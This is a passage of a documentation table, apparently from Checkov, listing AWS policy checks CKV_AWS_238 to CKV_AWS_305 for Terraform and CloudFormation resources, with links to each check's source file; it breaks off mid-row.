636 | CKV_AWS_238 | resource | aws_guardduty_detector | Ensure that GuardDuty detector is enabled | Terraform | [GuarddutyDetectorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GuarddutyDetectorEnabled.py) | -| 637 | CKV_AWS_239 | resource | aws_dax_cluster | Ensure DAX cluster endpoint is using TLS | Terraform | [DAXEndpointTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEndpointTLS.py) | -| 638 | CKV_AWS_240 | resource | aws_kinesis_firehose_delivery_stream | Ensure Kinesis Firehose delivery stream is encrypted | Terraform | [KinesisFirehoseDeliveryStreamSSE.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamSSE.py) | -| 639 | 
CKV_AWS_241 | resource | aws_kinesis_firehose_delivery_stream | Ensure that Kinesis Firehose Delivery Streams are encrypted with CMK | Terraform | [KinesisFirehoseDeliveryStreamUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamUsesCMK.py) | -| 640 | CKV_AWS_242 | resource | aws_mwaa_environment | Ensure MWAA environment has scheduler logs enabled | Terraform | [MWAASchedulerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py) | -| 641 | CKV_AWS_243 | resource | aws_mwaa_environment | Ensure MWAA environment has worker logs enabled | Terraform | [MWAAWorkerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py) | -| 642 | CKV_AWS_244 | resource | aws_mwaa_environment | Ensure MWAA environment has webserver logs enabled | Terraform | [MWAAWebserverLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py) | -| 643 | CKV_AWS_245 | resource | aws_db_instance_automated_backups_replication | Ensure replicated backups are encrypted at rest using KMS CMKs | Terraform | [RDSInstanceAutoBackupEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py) | -| 644 | CKV_AWS_246 | resource | aws_rds_cluster_activity_stream | Ensure RDS Cluster activity streams are encrypted using KMS CMKs | Terraform | [RDSClusterActivityStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py) | -| 645 | CKV_AWS_247 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | 
[ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | -| 646 | CKV_AWS_247 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | -| 647 | CKV_AWS_248 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | -| 648 | CKV_AWS_248 | resource | aws_opensearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | -| 649 | CKV_AWS_249 | resource | aws_ecs_task_definition | Ensure that the Execution Role ARN and the Task Role ARN are different in ECS Task definitions | Terraform | [ECSTaskDefinitionRoleCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionRoleCheck.py) | -| 650 | CKV_AWS_250 | resource | aws_db_instance | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | -| 651 | CKV_AWS_250 | resource | aws_rds_cluster | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | 
[RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | -| 652 | CKV_AWS_251 | resource | aws_cloudtrail | Ensure CloudTrail logging is enabled | Terraform | [CloudtrailEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEnableLogging.py) | -| 653 | CKV_AWS_252 | resource | aws_cloudtrail | Ensure CloudTrail defines an SNS Topic | Terraform | [CloudtrailDefinesSNSTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailDefinesSNSTopic.py) | -| 654 | CKV_AWS_253 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted | Terraform | [DLMEventsCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryption.py) | -| 655 | CKV_AWS_254 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted with Customer Managed Key | Terraform | [DLMEventsCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryptionWithCMK.py) | -| 656 | CKV_AWS_255 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted | Terraform | [DLMScheduleCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryption.py) | -| 657 | CKV_AWS_256 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted using a Customer Managed Key | Terraform | [DLMScheduleCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryptionWithCMK.py) | -| 658 | CKV_AWS_257 | resource | aws_codecommit_approval_rule_template | Ensure CodeCommit branch changes have at 
least 2 approvals | Terraform | [CodecommitApprovalsRulesRequireMin2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodecommitApprovalsRulesRequireMin2.py) | -| 659 | CKV_AWS_258 | resource | AWS::Lambda::Url | Ensure that Lambda function URLs AuthType is not None | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py) | -| 660 | CKV_AWS_258 | resource | aws_lambda_function_url | Ensure that Lambda function URLs AuthType is not None | Terraform | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionURLAuth.py) | -| 661 | CKV_AWS_259 | resource | aws_cloudfront_response_headers_policy | Ensure CloudFront response header policy enforces Strict Transport Security | Terraform | [CloudFrontResponseHeaderStrictTransportSecurity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudFrontResponseHeaderStrictTransportSecurity.py) | -| 662 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 663 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 664 | CKV_AWS_260 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | 
[SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 665 | CKV_AWS_260 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 666 | CKV_AWS_260 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 667 | CKV_AWS_261 | resource | aws_alb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | -| 668 | CKV_AWS_261 | resource | aws_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | -| 669 | CKV_AWS_262 | resource | aws_kendra_index | Ensure Kendra index Server side encryption uses CMK | Terraform | [KendraIndexSSEUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KendraIndexSSEUsesCMK.py) | -| 670 | CKV_AWS_263 | resource | aws_appflow_flow | Ensure AppFlow flow uses CMK | Terraform | [AppFlowUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py) | -| 671 | CKV_AWS_264 | resource | aws_appflow_connector_profile | Ensure AppFlow connector profile uses CMK | Terraform | 
[AppFlowConnectorProfileUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py) | -| 672 | CKV_AWS_265 | resource | aws_keyspaces_table | Ensure Keyspaces Table uses CMK | Terraform | [KeyspacesTableUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KeyspacesTableUsesCMK.py) | -| 673 | CKV_AWS_266 | resource | aws_db_snapshot_copy | Ensure DB Snapshot copy uses CMK | Terraform | [DBSnapshotCopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py) | -| 674 | CKV_AWS_267 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's model is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerModelUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerModelUsesCMK.py) | -| 675 | CKV_AWS_268 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerVolumeUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerVolumeUsesCMK.py) | -| 676 | CKV_AWS_269 | resource | aws_connect_instance_storage_config | Ensure Connect Instance Kinesis Video Stream Storage Config uses CMK | Terraform | [ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py) | -| 677 | CKV_AWS_270 | resource | aws_connect_instance_storage_config | Ensure Connect Instance S3 Storage Config uses CMK | Terraform | 
[ConnectInstanceS3StorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceS3StorageConfigUsesCMK.py) | -| 678 | CKV_AWS_271 | resource | aws_dynamodb_table_replica | Ensure DynamoDB table replica KMS encryption uses CMK | Terraform | [DynamoDBTableReplicaKMSUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTableReplicaKMSUsesCMK.py) | -| 679 | CKV_AWS_272 | resource | aws_lambda_function | Ensure AWS Lambda function is configured to validate code-signing | Terraform | [LambdaCodeSigningConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaCodeSigningConfigured.py) | -| 680 | CKV_AWS_273 | resource | aws_iam_user | Ensure access is controlled through SSO and not AWS IAM defined users | Terraform | [IAMUserNotUsedForAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserNotUsedForAccess.py) | -| 681 | CKV_AWS_274 | resource | aws_iam_group_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 682 | CKV_AWS_274 | resource | aws_iam_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 683 | CKV_AWS_274 | resource | aws_iam_role | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 684 | CKV_AWS_274 | resource | 
aws_iam_role_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 685 | CKV_AWS_274 | resource | aws_iam_user_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 686 | CKV_AWS_274 | resource | aws_ssoadmin_managed_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 687 | CKV_AWS_275 | data | aws_iam_policy | Disallow policies from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMManagedAdminPolicy.py) | -| 688 | CKV_AWS_276 | resource | aws_api_gateway_method_settings | Ensure Data Trace is not enabled in API Gateway Method Settings | Terraform | [APIGatewayMethodSettingsDataTrace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsDataTrace.py) | -| 689 | CKV_AWS_277 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | -| 690 | CKV_AWS_277 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | 
[SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | -| 691 | CKV_AWS_277 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | -| 692 | CKV_AWS_278 | resource | aws_memorydb_snapshot | Ensure MemoryDB snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [MemoryDBSnapshotEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBSnapshotEncryptionWithCMK.py) | -| 693 | CKV_AWS_279 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is securely encrypted | Terraform | [NeptuneClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncrypted.py) | -| 694 | CKV_AWS_280 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterSnapshotEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncryptedWithCMK.py) | -| 695 | CKV_AWS_281 | resource | aws_redshift_snapshot_copy_grant | Ensure RedShift snapshot copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py) | -| 696 | CKV_AWS_282 | resource | aws_redshiftserverless_namespace | Ensure that Redshift Serverless namespace is encrypted by KMS using a customer managed key (CMK) | Terraform | 
[RedshiftServerlessNamespaceKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftServerlessNamespaceKMSKey.py) | -| 697 | CKV_AWS_283 | data | aws_iam_policy_document | Ensure no IAM policies documents allow ALL or any AWS principal permissions to the resource | Terraform | [IAMPublicActionsPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPublicActionsPolicy.py) | -| 698 | CKV_AWS_284 | resource | aws_sfn_state_machine | Ensure State Machine has X-Ray tracing enabled | Terraform | [StateMachineXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineXray.py) | -| 699 | CKV_AWS_285 | resource | aws_sfn_state_machine | Ensure State Machine has execution history logging enabled | Terraform | [StateMachineLoggingExecutionHistory.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineLoggingExecutionHistory.py) | -| 700 | CKV_AWS_286 | resource | aws_iam_group_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 701 | CKV_AWS_286 | resource | aws_iam_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 702 | CKV_AWS_286 | resource | aws_iam_role_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 703 | CKV_AWS_286 | resource | aws_iam_user_policy | Ensure IAM policies does not allow privilege escalation | Terraform | 
[IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 704 | CKV_AWS_286 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 705 | CKV_AWS_287 | resource | aws_iam_group_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 706 | CKV_AWS_287 | resource | aws_iam_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 707 | CKV_AWS_287 | resource | aws_iam_role_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 708 | CKV_AWS_287 | resource | aws_iam_user_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 709 | CKV_AWS_287 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 710 | CKV_AWS_288 | resource | aws_iam_group_policy | Ensure IAM policies does not allow data exfiltration | Terraform | 
[IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 711 | CKV_AWS_288 | resource | aws_iam_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 712 | CKV_AWS_288 | resource | aws_iam_role_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 713 | CKV_AWS_288 | resource | aws_iam_user_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 714 | CKV_AWS_288 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 715 | CKV_AWS_289 | resource | aws_iam_group_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 716 | CKV_AWS_289 | resource | aws_iam_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 717 | CKV_AWS_289 | resource | aws_iam_role_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform 
| [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 718 | CKV_AWS_289 | resource | aws_iam_user_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 719 | CKV_AWS_289 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 720 | CKV_AWS_290 | resource | aws_iam_group_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 721 | CKV_AWS_290 | resource | aws_iam_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 722 | CKV_AWS_290 | resource | aws_iam_role_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 723 | CKV_AWS_290 | resource | aws_iam_user_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 724 | CKV_AWS_290 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow write access 
without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 725 | CKV_AWS_291 | resource | aws_msk_cluster | Ensure MSK nodes are private | Terraform | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterNodesArePrivate.py) | -| 726 | CKV_AWS_292 | resource | aws_docdb_global_cluster | Ensure DocumentDB Global Cluster is encrypted at rest (default is unencrypted) | Terraform | [DocDBGlobalClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBGlobalClusterEncryption.py) | -| 727 | CKV_AWS_293 | resource | aws_db_instance | Ensure that AWS database instances have deletion protection enabled | Terraform | [RDSInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceDeletionProtection.py) | -| 728 | CKV_AWS_294 | resource | aws_cloudtrail_event_data_store | Ensure CloudTrail Event Data Store uses CMK | Terraform | [CloudtrailEventDataStoreUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEventDataStoreUsesCMK.py) | -| 729 | CKV_AWS_295 | resource | aws_datasync_location_object_storage | Ensure DataSync Location Object Storage doesn't expose secrets | Terraform | [DatasyncLocationExposesSecrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DatasyncLocationExposesSecrets.py) | -| 730 | CKV_AWS_296 | resource | aws_dms_endpoint | Ensure DMS endpoint uses Customer Managed Key (CMK) | Terraform | [DMSEndpointUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSEndpointUsesCMK.py) | -| 731 | CKV_AWS_297 | resource | aws_scheduler_schedule | Ensure EventBridge Scheduler Schedule uses Customer Managed Key (CMK) | 
Terraform | [SchedulerScheduleUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SchedulerScheduleUsesCMK.py) | -| 732 | CKV_AWS_298 | resource | aws_dms_s3_endpoint | Ensure DMS S3 uses Customer Managed Key (CMK) | Terraform | [DMSS3UsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSS3UsesCMK.py) | -| 733 | CKV_AWS_300 | resource | aws_s3_bucket_lifecycle_configuration | Ensure S3 lifecycle configuration sets period for aborting failed uploads | Terraform | [S3AbortIncompleteUploads.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py) | -| 734 | CKV_AWS_301 | resource | aws_lambda_permission | Ensure that AWS Lambda function is not publicly accessible | Terraform | [LambdaFunctionIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionIsNotPublic.py) | -| 735 | CKV_AWS_302 | resource | aws_db_snapshot | Ensure DB Snapshots are not Public | Terraform | [DBSnapshotsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotsArePrivate.py) | -| 736 | CKV_AWS_303 | resource | aws_ssm_document | Ensure SSM documents are not Public | Terraform | [SSMDocumentsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMDocumentsArePrivate.py) | -| 737 | CKV_AWS_304 | resource | aws_secretsmanager_secret_rotation | Ensure Secrets Manager secrets should be rotated within 90 days | Terraform | [SecretManagerSecret90days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecret90days.py) | -| 738 | CKV_AWS_305 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a default root object configured | Terraform | 
